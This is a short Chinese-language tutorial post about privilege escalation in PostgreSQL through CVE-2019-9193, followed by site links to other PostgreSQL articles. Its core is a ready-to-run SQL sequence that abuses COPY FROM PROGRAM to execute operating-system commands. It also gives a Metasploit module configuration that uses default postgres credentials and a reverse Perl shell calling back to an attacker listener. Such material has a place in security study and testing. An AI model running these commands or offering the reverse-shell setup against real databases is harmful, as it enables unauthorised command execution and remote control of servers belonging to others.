PostgreSQL教程
postgresql提权
本文主要是介绍postgresql提权,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
(CVE-2019-9193)
CVE-2019-9193:PostpreSQL 9.3-11.2 允许经过身份验证的superuser或者拥有pg_read_server_files权限的用户执行任意命令:
drop table if exists cmd_exec; create table cmd_exec(cmd_output text); copy cmd_exec from program 'id'; select * from cmd_exec; drop table if exists cmd_exec;
需要注意的是:命令中的单引号需要用双引号进行转义,如:echo 'test' >> 'echo "test";'
MSF中也有对应的利用模块:
use exploit/multi/postgres/postgres_cmd_execution_nine_three set RHOST 192.168.1.5 set payload cmd/unix.reverse_perl set database postgres set username postgres set password postgres set LHOST 192.168.1.6 set LPORT 53 exploit
参考链接:http://t3ngyu.leanote.com/post/Postgresql
这篇关于postgresql提权的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
您可能喜欢
-
快速清空 PostgreSQL 数据库中的所有表格,让你的数据库重新焕然一新!01-05
-
在PostgreSQL中创建角色:判断角色是否存在并创建01-04
-
PostgreSQL一站式插件推荐 -- pg_enterprise_views05-16
-
PostgreSQL 实时位置跟踪11-22
-
如何将PostgreSQL插件移植到openGauss11-22
-
PostgreSQL:修改数据库用户的密码11-11
-
Windows 环境搭建 PostgreSQL 物理复制高可用架构数据库服务11-06
-
Windows 环境搭建 PostgreSQL 逻辑复制高可用架构数据库服务10-27
-
PostgreSql安装(Windows10版本)10-11
-
PostgreSQL-Network Address类型操作和函数09-13
-
PostgreSQL-运算符和函数309-11
-
PostgreSQL-数据类型309-08
-
postGIS+postgreSQL+Supermap部署GIS数据09-06
-
PostgreSQL-系统列09-04
-
PostgreSQL-插入09-04
栏目导航
